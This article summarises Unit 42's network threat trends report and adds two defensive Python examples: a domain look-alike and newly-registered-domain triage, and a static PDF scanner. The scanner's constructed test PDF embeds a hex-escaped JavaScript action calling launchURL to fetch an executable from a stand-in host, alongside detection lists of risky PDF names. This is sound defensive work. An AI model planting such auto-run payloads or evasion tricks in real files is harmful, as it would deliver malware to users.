Palo Alto Networks has published Volume 2 of its Unit 42 Network Threat Trends Research Report. The report analysed global telemetry from Palo Alto Networks' Next-Generation Firewall (NGFW), Cortex Data Lake, Advanced URL Filtering and Advanced WildFire, identifying and analysing the most significant and prevalent malware trends in the wild.
The rate of vulnerability exploitation shows no sign of slowing down (up from 147,000 attempts in 2021 to 228,000 in 2022), and threat actors are exploiting both vulnerabilities that have already been disclosed and ones that have not yet been disclosed, the report finds. Beyond vulnerability exploitation, it covers remote code execution (RCE), email-borne threats, compromised websites, newly registered domains (NRDs), ChatGPT/AI scams and cryptominer traffic.
Steve Manley, Regional Vice President ANZ at Palo Alto Networks, comments, "Threat actors are constantly evolving their techniques, adopting multivector attacks that aim to bypass detection by employing various evasion tools and camouflage methods.
"They have become adept at exploiting vulnerabilities, and by the time security researchers and software vendors close the door on one vulnerability, cyber criminals have already found the next door to creak open. Organisations must, therefore, simultaneously guard against malware designed to exploit older vulnerabilities while proactively staying ahead of sophisticated new attacks."
Some of the key findings from the report include:
- Exploitation of vulnerabilities has increased: There was a 55% increase in vulnerability exploitation attempts, per customer, on average, compared to 2021.
- PDFs are the most popular file type for delivering malware: PDFs are the primary malicious email attachment type, used 66% of the time to deliver malware via email.
- ChatGPT scams: Between November 2022 and April 2023, Unit 42 saw a 910% increase in monthly registrations of domains related to ChatGPT, both benign and malicious, including domains registered to mimic ChatGPT.
- Malware aimed at industries that rely on operational technology (OT) is increasing: The average number of malware attacks experienced per organisation in the manufacturing, utilities and energy industries increased by 238% between 2021 and 2022.
- Linux malware is on the rise, targeting cloud workloads: An estimated 90% of public cloud instances run on Linux, and attackers are seeking new opportunities in cloud workloads and IoT devices running Unix-like operating systems. The most common types of threats against Linux systems are botnets (47%), coinminers (21%) and backdoors (11%).
- Cryptominer traffic is on the rise: Cryptominer traffic doubled in 2022 and cryptomining continues to be an area of interest to threat actors; 45% of sampled organisations have a signature-trigger history that contains cryptominer-related traffic.
- Newly registered domains are a favoured tool: To avoid detection, threat actors use newly registered domains (NRDs) for phishing, social engineering and spreading malware. Visitors to adult websites (20.2%) and financial services sites (13.9%) are the most likely to be targeted with NRDs.
- Evasive threats will continue to become increasingly complex: While attackers' continued use of old vulnerabilities shows that they will reuse code as long as it proves lucrative, there comes a point where creating newer, more complex attack techniques becomes necessary. When basic evasions became popular and security vendors started detecting them, attackers responded by moving to more advanced techniques.
- Encrypted malware in traffic will keep increasing: 12.91% of malware traffic is already SSL/TLS-encrypted. As threat actors adopt more tactics that mimic those of legitimate businesses, malware families that use encrypted traffic to blend in with benign network traffic are expected to keep growing.
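The NRD and ChatGPT look-alike findings above translate into a simple check a SOC can run over its own DNS or proxy logs: how old is the domain, and does its registrable label imitate a brand that is currently being abused? The code below is an added example written for this page, not code from Palo Alto Networks or the Unit 42 report. The WHOIS creation dates and the observation date are constructed sample data, the 32-day NRD window is the editor's assumption rather than a figure from the report, and `osa_distance`, `brand_lookalike` and `triage_all` are names chosen here.

```python
"""Triage of domains seen in DNS or proxy logs against two of the findings
above: newly registered domains (NRDs) used for phishing, and look-alike
domains registered to mimic ChatGPT. Added example; not code from Palo Alto
Networks or the Unit 42 report. The WHOIS dates are constructed sample data
(a real deployment would fetch them over RDAP/WHOIS or take the NRD verdict
from a URL-filtering feed) and the 32-day window is the editor's assumption."""
from datetime import date

NRD_WINDOW_DAYS = 32             # assumption: younger than this counts as "newly registered"
BRANDS = ("chatgpt", "openai")   # brands whose look-alikes we want to catch
OBSERVED_ON = date(2023, 4, 20)  # constructed observation date for the sample below

# Constructed sample records: domain -> WHOIS creation date. Not real WHOIS data.
SAMPLE_WHOIS = {
    "example.com": date(1995, 8, 14),
    "chatgpt-login-verify.com": date(2023, 3, 28),
    "chatgtp.app": date(2023, 2, 11),
    "openai.com": date(2015, 4, 16),
    "statements-bank-update.net": date(2023, 4, 2),
}

def domain_age_days(created: date, today: date) -> int:
    return (today - created).days

def is_newly_registered(created: date, today: date, window_days: int = NRD_WINDOW_DAYS) -> bool:
    return 0 <= domain_age_days(created, today) < window_days

def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus adjacent-character
    transposition, so 'chatgtp' is one edit from 'chatgpt' rather than two."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]

def registrable_label(domain: str) -> str:
    """Label left of the TLD. Assumes a single-label public suffix (.com, .app);
    a production tool would consult the Public Suffix List for co.uk and friends."""
    return domain.lower().rstrip(".").split(".")[-2]

def brand_lookalike(domain: str, brands=BRANDS, max_distance: int = 1):
    """Return the brand a domain imitates, or None.

    A domain is a look-alike if any window of its registrable label, of the
    brand's length, is within max_distance edits of the brand. That catches
    both 'chatgpt-login-verify.com' (brand embedded verbatim) and
    'chatgtp.app' (transposition). The brand's own domain is not flagged."""
    label = registrable_label(domain)
    for brand in brands:
        if label == brand:
            return None
        n = len(brand)
        for i in range(max(1, len(label) - n + 1)):
            if osa_distance(label[i:i + n], brand) <= max_distance:
                return brand
    return None

def triage(domain: str, created: date, today: date) -> list:
    """Reasons a domain deserves a closer look; an empty list means nothing found."""
    reasons = []
    if is_newly_registered(created, today):
        reasons.append(f"NRD ({domain_age_days(created, today)} days old)")
    brand = brand_lookalike(domain)
    if brand:
        reasons.append(f"lookalike of {brand}")
    return reasons

def triage_all(records: dict, today: date) -> dict:
    return {domain: triage(domain, created, today) for domain, created in records.items()}

if __name__ == "__main__":
    for domain, reasons in triage_all(SAMPLE_WHOIS, OBSERVED_ON).items():
        print(f"{domain:30} {', '.join(reasons) or 'ok'}")
```

Run stand-alone, the block prints one line per sample domain; `chatgpt-login-verify.com` is flagged on both counts, `chatgtp.app` only as a look-alike (it is older than the window) and `statements-bank-update.net` only as an NRD. Both signals are hints rather than verdicts: legitimate businesses register domains every day, and the 910% figure above explicitly includes benign registrations, so the output belongs in a triage queue, not in a block list.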
Sean Duca, VP and Regional Chief Security Officer at Palo Alto Networks, says, "As millions of people use ChatGPT, it's unsurprising that we see ChatGPT-related scams, which have exploded over the past year, as cyber criminals take advantage of the hype around AI. But the trusty email PDF is still the most common way cybercriminals deliver malware.
"Cyber criminals, no doubt, are looking at how they can leverage it for their nefarious activities, but for now, simple social engineering will do just fine at tricking potential victims.
"Organisations must therefore take a holistic view of their security environment to provide comprehensive oversight of their network and ensure security best practices are followed at every level of the organisation."
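Since the report singles out the email PDF as the most common malware delivery vehicle, a mail gateway or SOC analyst wants a quick static triage of an attachment before it reaches a user: does the document do anything on open, and does it carry JavaScript, a launch action or an embedded file? The following is an added example written for this page, not code from the report or from Palo Alto Networks. Both PDFs are constructed by hand for the example (the "suspect" one carries an inert JavaScript string pointing at a reserved `.invalid` host), and `RISKY_NAMES`, `RISKY_JS_CALLS`, `inflate_streams` and `triage_pdf` are names chosen here.

```python
"""Static triage of PDF attachments for the features malicious PDFs commonly
rely on: auto-run actions, JavaScript, launch actions, embedded files.
Added example; not code from the Unit 42 report or Palo Alto Networks.
The two PDFs at the bottom are constructed by hand and are not real samples."""
import re
import zlib

# PDF name objects worth a closer look. Presence is a risk signal, not proof
# of malice: plenty of legitimate forms carry /JavaScript and /AA.
RISKY_NAMES = {
    b"/OpenAction": "action runs automatically when the document opens",
    b"/AA": "additional actions (page or form-field triggers)",
    b"/JavaScript": "JavaScript action",
    b"/JS": "JavaScript code object",
    b"/Launch": "launches an external program",
    b"/EmbeddedFile": "embedded file (typical dropper payload)",
}
# Acrobat JavaScript calls that malicious documents tend to use.
RISKY_JS_CALLS = (b"launchURL", b"exportDataObject", b"submitForm", b"util.printf")
AUTO_TRIGGERS = {"/OpenAction", "/AA"}
PAYLOAD_CARRIERS = {"/JavaScript", "/JS", "/Launch", "/EmbeddedFile"}

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
# Stream body sits between 'stream'+EOL and EOL+'endstream'; the lookbehind
# stops 'endstream' itself from being taken as the start of a stream.
_STREAM = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)
# Direct /Length value; '/Length 5 0 R' (indirect reference) is not matched.
_LENGTH = re.compile(rb"/Length\s+(\d+)(?![0-9]|\s+\d+\s+R)")

def normalise_names(data: bytes) -> bytes:
    """Undo the '#xx' escape allowed in PDF names, so '/Java#53cript' reads '/JavaScript'."""
    return _HEX_ESCAPE.sub(lambda m: bytes.fromhex(m.group(1).decode()), data)

def has_name(haystack: bytes, name: bytes) -> bool:
    """Match a name only where it ends at a PDF delimiter or whitespace,
    so '/JS' does not fire on '/JSON' and '/AA' does not fire on '/AAPL'."""
    return re.search(re.escape(name) + rb"(?=[\s()<>\[\]{}/%]|$)", haystack) is not None

def inflate_streams(data: bytes) -> bytes:
    """Inflated contents of every /FlateDecode stream, joined, so keywords
    hidden inside compressed streams are scanned as well."""
    out = []
    for m in _STREAM.finditer(data):
        header = data[max(0, m.start() - 256):m.start()]  # the stream dictionary precedes 'stream'
        if b"/FlateDecode" not in header:
            continue
        lengths = _LENGTH.findall(header)  # prefer the declared length over the EOL heuristic
        body = data[m.start(1):m.start(1) + int(lengths[-1])] if lengths else m.group(1)
        try:
            out.append(zlib.decompressobj().decompress(body))
        except zlib.error:
            pass  # corrupt or deliberately malformed stream: skip it, keep scanning
    return b"\n".join(out)

def triage_pdf(data: bytes) -> dict:
    """Risky names and JavaScript calls found in the file, plus a verdict."""
    if not data.startswith(b"%PDF-"):
        return {"is_pdf": False, "findings": {}, "js_calls": [], "verdict": "not-a-pdf"}
    # Hex-decode names in the raw file and in the inflated streams separately,
    # so the '#xx' rewrite never corrupts compressed bytes before inflation.
    text = normalise_names(data) + b"\n" + normalise_names(inflate_streams(data))
    findings = {n.decode(): why for n, why in RISKY_NAMES.items() if has_name(text, n)}
    js_calls = [c.decode() for c in RISKY_JS_CALLS if c in text]
    if findings.keys() & AUTO_TRIGGERS and (findings.keys() & PAYLOAD_CARRIERS or js_calls):
        verdict = "quarantine"  # something runs on open and there is a payload for it to run
    elif findings or js_calls:
        verdict = "review"
    else:
        verdict = "clean"
    return {"is_pdf": True, "findings": findings, "js_calls": js_calls, "verdict": verdict}

# Constructed sample 1: a plain one-page document with nothing active.
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
# Constructed sample 2: /OpenAction pointing at a JavaScript action whose code
# hides in a Flate-compressed stream, with the action type hex-escaped.
_JS = zlib.compress(b"app.launchURL('http://payload.invalid/update.exe', true);")
SUSPECT_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"4 0 obj << /S /Java#53cript /JS 5 0 R >> endobj\n"  # '#53' is 'S', a common evasion
    b"5 0 obj << /Length " + str(len(_JS)).encode() + b" /Filter /FlateDecode >>\nstream\n"
    + _JS + b"\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, pdf in (("benign", BENIGN_PDF), ("suspect", SUSPECT_PDF)):
        print(label, triage_pdf(pdf))
```

The suspect sample is caught only because the scanner undoes the `#53` name escape and inflates the compressed stream; a naive `grep` for `/JavaScript` on the raw bytes would miss both. A `clean` verdict is not a clean bill of health: object streams using other filters, encrypted documents, and exploits that target font or image parsers carry none of these names, which is why attachments that pass static triage still belong in sandbox detonation.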